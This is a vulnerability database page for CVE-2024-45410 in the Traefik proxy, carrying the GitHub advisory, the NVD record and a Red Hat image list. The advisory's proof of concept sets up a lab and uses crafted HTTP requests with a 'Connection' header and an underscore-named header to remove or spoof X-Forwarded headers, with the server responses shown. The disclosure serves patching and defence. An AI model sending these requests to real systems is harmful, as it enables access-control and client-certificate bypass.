"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang-jwt/jwt: jwt-go allows excessive memory allocation during header parsing"
}
]
}
GHSA-62C8-MH53-4CQV
Vulnerability from github – Published: 2024-09-19 14:48 – Updated: 2024-09-25 19:29
VLAI?
Summary
HTTP client can manipulate custom HTTP headers that are added by Traefik
Details
Impact
There is a vulnerability in Traefik that allows the client to remove the X-Forwarded headers (except the header X-Forwarded-For).
Patches
- https://github.com/traefik/traefik/releases/tag/v2.11.9
- https://github.com/traefik/traefik/releases/tag/v3.1.3
Workarounds
No workaround.
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description ### Summary When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed: Connection: close, X-Forwarded-Host Depending on how the receiving application handles such cases, security implications may arise. Moreover, some application frameworks (e.g. Django) first transform the "-" to "_" signs, making it possible for the HTTP client to even modify these headers in these cases. This is similar to [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813) for Apache HTTP Server. ### Details It was found that the following headers can be removed in this way (i.e. by specifing them within a connection header): - X-Forwarded-Host - X-Forwarded-Port - X-Forwarded-Proto - X-Forwarded-Server - X-Real-Ip - X-Forwarded-Tls-Client-Cert - X-Forwarded-Tls-Client-Cert-Info ### PoC The following docker-compose file has been used for a simple setup:services:
traefik:
image: traefik:v3.1
container_name: traefik
ports:
- "443:443"
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik.yaml:/etc/traefik/traefik.yaml
- ./traefik-certs:/certs
python-http:
build:
context: .
dockerfile: Dockerfile
container_name: python-http
labels:
- "traefik.enable=true"
- "traefik.http.routers.python-http.rule=Host(`python.example.com`)"
- "traefik.http.routers.python-http.entrypoints=websecure"
- "traefik.http.routers.python-http.tls=true"
- "traefik.http.services.python-http.loadbalancer.server.port=8080"
providers:
docker:
exposedByDefault: false
watch: true
file:
fileName: /etc/traefik/traefik.yaml
watch: true
entryPoints:
websecure:
address: ":443"
tls:
certificates:
- certFile: /certs/server-cert.pem
keyFile: /certs/server-key.pem
FROM python:3-alpine
# Copy the Python script to the container
COPY server.py /server.py
# Set the working directory
WORKDIR /
# Command to run the Python server
CMD ["python", "/server.py"]
The environment is run with `sudo docker-compose up`.
A normal HTTP request/response pair looks like this:
**Request 1**
**Response 1**
The custom headers added by Traefik can be seen in the response.
Next, a request, where the X-Forwarded-Host header is defined as a hop-by-hop header via the Connection header is sent:
**Request 2**
**Response 2**
As can be seen from the response, the X-Forwarded-Host header that had been added by Traefik has been removed from the request.
Moreover, the next request/response pair demonstrates that a custom header with underscore instead of hyphen can be added:
**Request 3**
**Response 3**
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-beta3"
},
{
"fixed": "3.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45410"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-348"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-19T14:48:10Z",
"nvd_published_at": "2024-09-19T23:15:11Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nThere is a vulnerability in Traefik that allows the client to remove the X-Forwarded headers (except the header X-Forwarded-For).\n\n### Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.9\n- https://github.com/traefik/traefik/releases/tag/v3.1.3\n\n### Workarounds\n\nNo workaround.\n\n### For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n### Summary\n\nWhen a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified.\n\nFor HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed:\n\nConnection: close, X-Forwarded-Host\n\nDepending on how the receiving application handles such cases, security implications may arise. Moreover, some application frameworks (e.g. Django) first transform the \"-\" to \"_\" signs, making it possible for the HTTP client to even modify these headers in these cases.\n\nThis is similar to [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813) for Apache HTTP Server.\n\n### Details\n\nIt was found that the following headers can be removed in this way (i.e. by specifing them within a connection header):\n\n- X-Forwarded-Host\n- X-Forwarded-Port\n- X-Forwarded-Proto\n- X-Forwarded-Server\n- X-Real-Ip\n- X-Forwarded-Tls-Client-Cert\n- X-Forwarded-Tls-Client-Cert-Info\n\n### PoC\n\nThe following docker-compose file has been used for a simple setup:\n\n```\nservices:\n traefik:\n image: traefik:v3.1\n container_name: traefik\n ports:\n - \"443:443\"\n volumes:\n - /var/run/docker.sock:/var/run/docker.sock:ro\n - ./traefik.yaml:/etc/traefik/traefik.yaml\n - ./traefik-certs:/certs\n\n python-http:\n build:\n context: .\n dockerfile: Dockerfile\n container_name: python-http\n labels:\n - \"traefik.enable=true\"\n - \"traefik.http.routers.python-http.rule=Host(`python.example.com`)\"\n - \"traefik.http.routers.python-http.entrypoints=websecure\"\n - \"traefik.http.routers.python-http.tls=true\"\n - \"traefik.http.services.python-http.loadbalancer.server.port=8080\"\n```\n\nThe following traefik.yaml has been used:\n\n```\nproviders:\n docker:\n exposedByDefault: false\n watch: true\n file:\n fileName: /etc/traefik/traefik.yaml\n watch: true\n\nentryPoints:\n websecure:\n address: \":443\"\n\ntls:\n certificates:\n - certFile: /certs/server-cert.pem\n keyFile: /certs/server-key.pem\n```\n\nThe Python container just includes a simple Python HTTP server that prints the HTTP headers it receives. Here is the Dockerfile for the container:\n\n```\nFROM python:3-alpine\n\n# Copy the Python script to the container\nCOPY server.py /server.py\n\n# Set the working directory\nWORKDIR /\n\n# Command to run the Python server\nCMD [\"python\", \"/server.py\"]\n```\n\nAnd here is the Python script:\n\n```\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass RequestHandler(BaseHTTPRequestHandler):\n def _send_response(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(str(self.headers).encode(\"utf-8\"))\n\n def do_GET(self):\n self._send_response()\n\nif __name__ == \"__main__\":\n server = HTTPServer((\u00270.0.0.0\u0027, 8080), RequestHandler)\n print(\"Server started on port 8080\")\n server.serve_forever()\n````\n\nThe environment is run with `sudo docker-compose up`.\n\nA normal HTTP request/response pair looks like this:\n\n**Request 1**\n\n````\nGET / HTTP/1.1\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nConnection: close\n````\n\n**Response 1**\n\n````\nHTTP/1.1 200 OK\nContent-Type: text/plain\nDate: Tue, 03 Sep 2024 06:53:49 GMT\nServer: BaseHTTP/0.6 Python/3.12.5\nConnection: close\nContent-Length: 556\n\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nX-Forwarded-For: 172.20.0.1\nX-Forwarded-Host: python.example.com\nX-Forwarded-Port: 443\nX-Forwarded-Proto: https\nX-Forwarded-Server: 3138fe4f0a2e\nX-Real-Ip: 172.20.0.1\n````\n\nThe custom headers added by Traefik can be seen in the response.\n\nNext, a request, where the X-Forwarded-Host header is defined as a hop-by-hop header via the Connection header is sent:\n\n**Request 2**\n\n````\nGET / HTTP/1.1\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nConnection: close, X-Forwarded-Host\n````\n\n**Response 2**\n\n````\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nX-Forwarded-For: 172.20.0.1\nX-Forwarded-Port: 443\nX-Forwarded-Proto: https\nX-Forwarded-Server: 3138fe4f0a2e\nX-Real-Ip: 172.20.0.1\n````\n\nAs can be seen from the response, the X-Forwarded-Host header that had been added by Traefik has been removed from the request.\n\nMoreover, the next request/response pair demonstrates that a custom header with underscore instead of hyphen can be added:\n\n**Request 3**\n\n````\nGET / HTTP/1.1\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nX_Forwarded_Host: myhost\nConnection: close, X-Forwarded-Host\n````\n\n**Response 3**\n\n````\nHTTP/1.1 200 OK\nContent-Type: text/plain\nDate: Tue, 03 Sep 2024 06:54:48 GMT\nServer: BaseHTTP/0.6 Python/3.12.5\nConnection: close\nContent-Length: 544\n\nHost: python.example.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nAccept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\nPriority: u=0, i\nX-Forwarded-For: 172.20.0.1\nX-Forwarded-Port: 443\nX-Forwarded-Proto: https\nX-Forwarded-Server: 3138fe4f0a2e\nX-Real-Ip: 172.20.0.1\nX_forwarded_host: myhost\n````\n\nSome backend frameworks (e.g. Django) handle X-Forwarded-Host and X_forwarded_host in the same way. As there is no X-Forwarded-Host header present in the request, the X_forwarded_host header will be used. \n\nIt should be noted that when X-Forwarded-Host is present and a X_forwarded_host header is sent, usually the first occurence of the header will be used, which is in this case X-Forwarded-Host.\n\nIt should be noted that the headers X-Forwarded-Tls-Client-Cert and X-Forwarded-Tls-Client-Cert-Info are also affected. Here, client certificate authentication would need to be enabled in the Traefik setup.\n\n### Impact\n\nAll applications that trust the custom headers set by Traefik are affected by this vulnerability. As an example, assume that a backend application trusts Traefik to validate client certificates and trusts therefore the values that are sent within the X-Forwarded-Tls-Client-Cert header, but does not validate the certificate anew.\n\nIf the header is removed via the vulnerability, and the application framework allows for alternative names (e.g. by transforming the headers to lower case, and \"-\" to \"_\"), an attacker can place his own X_Forwarded_TLS_Client_Cert header in the request. This could lead to privilege escalation, as the attacker may put an (invalid) certificate in this header that would just be accepted by the application, but may contain other data than the certificate that is presented to Traefik for Client Certificate Authentication.\n\nMoreover, if the backend application uses any of the other custom headers for security-sensitive operations, the removal or modification of these headers may also security implications (e.g. access control bypass).\n\nThe severity is the same as for [CVE-2022-31813](https://nvd.nist.gov/vuln/detail/CVE-2022-31813) for Apache HTTP Server, i.e. 9.8 Critical.\n\u003c/details\u003e",
"id": "GHSA-62c8-mh53-4cqv",
"modified": "2024-09-25T19:29:53Z",
"published": "2024-09-19T14:48:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45410"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/commit/584144100524277829f26219baaab29a53b8134f"
},
{
"type": "PACKAGE",
"url": "https://github.com/traefik/traefik"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.9"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.1.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "HTTP client can manipulate custom HTTP headers that are added by Traefik"
}
FKIE_CVE-2024-45410
Vulnerability from fkie_nvd - Published: 2024-09-19 23:15 - Updated: 2024-09-25 17:39
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Summary
Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8862E39-A57C-4CD5-A289-A853D9402298",
"versionEndExcluding": "2.11.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
"matchCriteriaId": "31D16308-8F47-4EAC-B102-1FDEA4B3F9F1",
"versionEndExcluding": "3.1.3",
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability."
},
{
"lang": "es",
"value": "Traefik es un proxy de aplicaci\u00f3n nativo de la nube (golang). Cuando Traefik procesa una solicitud HTTP, Traefik agrega ciertos encabezados HTTP como X-Forwarded-Host o X-Forwarded-Port antes de que la solicitud se env\u00ede a la aplicaci\u00f3n. Para un cliente HTTP, no deber\u00eda ser posible eliminar o modificar estos encabezados. Dado que la aplicaci\u00f3n conf\u00eda en el valor de estos encabezados, podr\u00edan surgir implicaciones de seguridad si se pueden modificar. Sin embargo, para HTTP/1.1, se descubri\u00f3 que algunos de estos encabezados personalizados s\u00ed se pueden eliminar y, en ciertos casos, manipular. El ataque se basa en el comportamiento de HTTP/1.1, que permite definir los encabezados como salto a salto a trav\u00e9s del encabezado de conexi\u00f3n HTTP. Este problema se ha solucionado en las versiones de lanzamiento 2.11.9 y 3.1.3. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"id": "CVE-2024-45410",
"lastModified": "2024-09-25T17:39:08.033",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-09-19T23:15:11.480",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/traefik/traefik/releases/tag/v3.1.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-345"
},
{
"lang": "en",
"value": "CWE-348"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-345"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…